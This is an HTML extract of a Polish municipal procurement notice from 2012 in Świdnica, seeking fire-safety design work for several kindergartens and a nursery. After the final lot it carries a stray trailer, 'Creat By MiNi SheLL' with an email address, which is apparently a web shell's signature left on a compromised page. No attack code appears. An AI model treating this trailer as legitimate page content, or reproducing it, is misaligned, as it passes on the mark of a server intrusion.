<ul class="kh_indent_1"><li><p>Wykonawca wykaże się opracowaniem co najmniej dwóch projektów budowlanych wraz z projektami wykonawczymi1 dla przedsięwzięć polegających na wykonaniu dokumentacji projektowych i kosztorysowych oraz dwóch ekspertyz technicznych rzeczoznawcy ds. zabezpieczeń p.poż. i rzeczoznawcy budowlanego, zrealizowanych w okresie ostatnich trzech lat przed dniem wszczęcia postępowania, a jeśli okres prowadzenia działalności jest krótszy - w tym okresie o wartości większej bądź równej 50 000 zł netto, przedmiotu, dat wykonania i odbiorców oraz załączeniem dokumentów potwierdzających3, że usługi te zostały wykonane należycie.

Wyjaśnienia do indeksów 1, 2 i 3: 
1  Projekt budowlany i wykonawczy to kompleksowe opracowanie dla jednego tematu inwestycyjnego zawierające w swoim wykazie wszystkie niezbędne branże.
2 Wartość opracowanych dokumentacji to wartość umów zawartych pomiędzy Wykonawcą, a Zamawiającymi na wykonane prace projektowe, która łącznie winna być większa bądź równa 50 000 zł netto.
3  Dokumenty potwierdzające należyte wykonanie - np. protokoły odbioru dokumentacji projektowej, referencje, kopie pozwolenia na budowę, kopie faktur.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca wykaże, że posiada ubezpieczenie od odpowiedzialności cywilnej w zakresie prowadzonej działalności projektowej, na sumę ubezpieczenia nie mniejszą niż 50.000,00 zł (słownie: pięćdziesiąt tysięcy złotych).</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>8.8. Dodatkowo Wykonawca winien do oferty dołączyć:
8.8.1. Pełnomocnictwo do podpisania oferty w przypadku, gdy ofertę podpisuje osoba (osoby nie wskazane w dokumencie rejestrowym) upoważniona do składania oświadczeń woli przez Wykonawcę (załącznik nr 10 do oferty Wykonawcy),
8.8.2. Pełnomocnictwo dla pełnomocnika składającego ofertę w ramach oferty wspólnej (załącznik nr 11 do oferty Wykonawcy),
8.8.3. Zaparafowany projekt umowy - załącznik B do SIWZ (zał. nr 12 do oferty Wykonawcy).
8.9. Każdy z podmiotów występujących wspólnie zobowiązany jest do złożenia oświadczeń i dokumentów określonych w rozdz. 8, ust. 8.1 oraz ust. 8.5 Specyfikacji. Pozostałe dokumenty</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zawarta umowa w sprawie niniejszego zamówienia publicznego między Zamawiającym, a Wykonawcą może być zmieniona na wniosek jednej ze stron umowy, za zgodą obu stron, z zastrzeżeniem jak w ust. 19.4.
19.3. Wniosek o zmianę umowy zawierać musi:
- opis zmiany,
- uzasadnienie zmiany,
- koszt zmiany oraz wpływ zmiany na wysokość wynagrodzenia,
- czas wykonania zmiany oraz wpływ zmiany na termin zakończenia prac projektowych.
19.4. Zmiana umowy dotyczyć może:
19.4.1. zmiany wynikającej ze zmiany przepisów bądź wymogów szczególnych dotyczących inwestycji objętych przedmiotem zamówienia, w tym przepisów i wymogów stawianych dokumentom przez instytucje opiniodawcze i uzgadniające;
19.4.2. zmiany terminu wykonania prac projektowych związanych ze zmianą zakresu prac (przedmiotu zamówienia) jw. lub z przyczyn nie leżących po stronie Wykonawcy.
19.4.3. zmiany stawki podatku VAT.
19.5. Termin gwarancji jakości prac projektowych rozpoczyna się od daty uzyskania przez Zamawiającego decyzji o pozwoleniu na budowę, a kończy po bezusterkowym odbiorze robót budowlanych zrealizowanych w oparciu o dokumentację będącą przedmiotem niniejszej umowy i uzyskaniu decyzji o pozwoleniu na użytkowanie, jednakże nie później jak do 30 listopada 2016 r.
19.6. W przypadku nie realizowania obiektów na podstawie opracowanej dokumentacji termin gwarancji wygasa po upływie 3 lat od daty uzyskania pozwolenia na budowę.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.swidnica.bip-gov.info.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski w Świdnicy, ul. Armii Krajowej 49, 58-100 Świdnica, Miejskie Biuro Przetargów, Pok. 124, I p..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 08.08.2012 godzina 09:00, miejsce: Urząd Miejski w Świdnicy, ul. Armii Krajowej 49, 58-100 Świdnica, Miejskie Biuro Przetargów, Pok. 124, I p..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> ZADANIE nr 1: Przedszkole Miejskie nr 1, pl. św. Małgorzaty 15 w Świdnicy, tel. 74 852 16 19;.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1) w Przedszkolu Miejskim nr 1, pl. św. Małgorzaty 15 w Świdnicy, tel. 74 852 16 19 - ZADANIE nr 1:
a) zapewnić urządzenia zapobiegające zadymianiu lub służące do usuwania dymu z klatki schodowej,
b) zapewnić wymaganą przepisami techniczno-budowlanymi długość dojścia ewakuacyjnego w obiekcie,
c) zapewnić w budynku punkty poboru wody do celów przeciwpożarowych - hydranty wewnętrzne 25 z wężem półsztywnym;
Zamawiający posiada ekspertyzę techniczną dot. budynku Przedszkola Miejskiego nr 1 z zakresu ochrony przeciwpożarowej oraz Postanowienie Dolnośląskiego Komendanta Wojewódzkiego Państwowej Straży Pożarnej we Wrocławiu w sprawie wyrażenia zgody na spełnienie wymagań w zakresie bezpieczeństwa pożarowego..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.22.10.00-3, 71.24.80.00-8, 71.32.00.00-7.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 10.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> ZADANIE nr 2: Przedszkole Miejskie nr 4, ul. Lelewela 10 w Świdnicy, tel. 74 852 03 97;.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> w Przedszkolu Miejskim nr 4, ul. Lelewela 10 w Świdnicy, tel. 74 852 03 97 - ZADANIE nr 2:
a) zapewnić urządzenia zapobiegające zadymianiu lub służące do usuwania dymu z klatek schodowych,
b) zapewnić wymaganą przepisami techniczno-budowlanymi długość dojścia ewakuacyjnego w obiekcie,
c) zapewnić w budynku punkty poboru wody do celów przeciwpożarowych - hydranty wewnętrzne 25 z wężem półsztywnym;.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.22.10.00-3, 71.24.80.00-8, 71.32.00.00-7.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 10.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> ZADANIE nr 3: Przedszkole Miejskie nr 14, ul. M. Kozara - Słobódzkiego 10 w Świdnicy, tel. 74 852 17 42;.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> w Przedszkolu Miejskim nr 14, ul. M. Kozara-Słobódzkiego 10 w Świdnicy, tel. 74 852 17 42 - ZADANIE nr 3:
a) zapewnić urządzenia zapobiegające zadymianiu lub służące do usuwania dymu z klatek schodowych,
b) zapewnić oświetlenie ewakuacyjne na drogach ewakuacyjnych,
c) zapewnić wymaganą przepisami techniczno-budowlanymi szerokość poziomych dróg ewakuacyjnych..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.22.10.00-3, 71.24.80.00-8, 71.32.00.00-7.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 10.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> ZADANIE nr 4: Przedszkole Miejskie nr 15, ul. Ofiar Oświęcimskich 45 w Świdnicy, tel. 74 852 43 53;.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> w Przedszkolu Miejskim nr 15, ul. Ofiar Oświęcimskich 45 w Świdnicy, tel. 74 852 43 53 - ZADANIE nr 4:
a) zapewnić urządzenia zapobiegające zadymianiu lub służące do usuwania dymu z klatek schodowych,
b) zapewnić oświetlenie ewakuacyjne na drogach ewakuacyjnych..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.22.10.00-3, 71.24.80.00-8, 71.32.00.00-7.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 10.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> ZADANIE nr 5: Przedszkole Miejskie nr 16, ul. Marcinkowskiego 10 w Świdnicy, tel. 74 852 60 70;.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> ) w Przedszkolu Miejskim nr 16, ul. Marcinkowskiego 10 w Świdnicy, tel. 74 852 60 70 - ZADANIE nr 5:
a) zapewnić urządzenia zapobiegające zadymianiu lub służące do usuwania dymu z klatek schodowych,
b) zapewnić oświetlenie ewakuacyjne na drogach ewakuacyjnych;.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.22.10.00-3, 71.24.80.00-8, 71.32.00.00-7.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 10.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> ZADANIE nr 6: Żłobek Miejski nr 1, ul. M. Kozara - Słobódzkiego 26 w Świdnicy, tel. 74 640 86 30..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> w Żłobku Miejskim nr 1, ul. M. Kozara-Słobódzkiego 26 w Świdnicy, tel. 74 640 86 30 - ZADANIE nr 6:
a) zapewnić urządzenia zapobiegające zadymianiu lub służące do usuwania dymu z klatek schodowych,
b) zapewnić oświetlenie ewakuacyjne na drogach ewakuacyjnych..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.22.10.00-3, 71.24.80.00-8, 71.32.00.00-7.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 10.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com